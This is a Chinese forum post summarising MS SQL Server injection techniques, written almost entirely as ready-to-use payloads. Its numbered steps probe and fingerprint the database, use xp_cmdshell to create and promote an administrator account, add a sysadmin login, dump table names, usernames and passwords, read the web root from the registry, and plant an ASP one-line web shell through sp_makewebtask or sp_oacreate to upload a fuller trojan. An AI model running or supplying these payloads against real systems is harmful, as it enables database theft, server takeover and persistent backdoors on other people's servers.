设为首页 收藏本站
查看: 482|回复: 0

[经验分享] MS SQL 注入总结

[复制链接]

尚未签到

发表于 2016-11-11 10:48:34 | 显示全部楼层 |阅读模式
  1.
and 1=1
  and 1=2
  
2. and user>0
  and db_name()>0
  and @@version>0
  and 1=(select IS_SRVROLEMEMBER('sysadmin'))
  and 'sa'=(select system_user)
  and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')
  and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_regread')
  and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='sp_makewebtask')
  
3. xp_cmdshell?
  ;EXEC master..xp_cmdshell "net user lee 123456 /add"--
  ;EXEC master..xp_cmdshell "net localgroup administrators lee /add"--
  ;Backup database db_name to disk='c:\inetpub\wwwroot\save.db'--
  
4. ;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'--
  ;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','@dllname'-- //没有xplog70.dll也可以
  ;EXEC master.dbo.sp_addlogin test,test--
  ;EXEC master.dbo.sp_addsrvrolemember test,sysadmin--
  ;EXEC master.dbo.sp_password test,123456,test--
  ;EXEC master.dbo.xp_cmdshell 'net user IWAM-IUSR /add'--
  5. and (Select top 1 name from (select top N id,name from sysobjects where xtype=‘u’ order by id) T order by id desc)>0 //表名
  and 1<(select top 1 col_name(object_id(‘表名’),N) from sysobjects) //列名
  and (select top 1 name from (select top N id,username from 表名 order by id) T order by id desc)>0 //用户
  and (select password from 表名 where username=‘XX’)>0 //密码
  
6. ;create table jm_tmp(value nvarchar(4000) null,data nvarchar(4000) null)--
  ;insert jm_tmp exec master.dbo.xp_regread
  'HKEY_LOCAL_MACHINE','SYSTEM\controlset001\services\w3svc\parameters\virtual roots','/'-- (2000 server)
  ;and 1=(select top 1 cast[data] as nvarchar(4000) + char(124) from [jm_tmp] order by [data] desc)
  ;drop table jm_tmp--
  
;create table [dbo].[lee] ([test][char](255));--
  ;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into lee (test) values( @result );--
  and 1=(select count(*) from lee where test >1)
  ;drop table lee--
  
7. 写一个简单木马到服务器:先创建一个表,在把木马文件添加到表里,使用sp_makewebtask把表导成一个ASP木马文件EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表',如
  ;create table lee(test nvarchar(4000))--
  ;insert into lee(test) values ('<%eval request("a")%>') --//一句话木马
  ;EXECUTE sp_makewebtask @outputfile ='E:\Project\攻防\SQL注入\漏洞程序\dvbbs6.0.0\test.asp', @query = 'SELECT test FROM lee' --
  ;drop table lee--
  
直接写一个简易木马到WEB绝对路径(可以由xp_regread来获取)下:
  ;declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject',
  @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\test.asp',
  1 exec @ret = sp_oamethod @f, 'writeline', NULL, '<%dim objFSO%>'--
  ——在WEB绝对路径下创建一个test.asp文件,并写入一句<%dim objFSO%>
  ;declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject',
  @o out exec sp_oamethod @o, 'opentextfile', @f out, 'c:\inetpub\wwwroot\test.asp',
  8 exec @ret = sp_oamethod @f, 'writeline', NULL, '<%dim fdata%> '—
  写的时候要把%换成%25
  ——用同样的方法把木马程序所有的语句写到test.asp文件中。再利用test.asp上传一个功能强大的木马文件,比如海阳2006

运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-298851-1-1.html 上篇帖子: 一些很精妙的sql 下篇帖子: SQL in condition expresssion
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表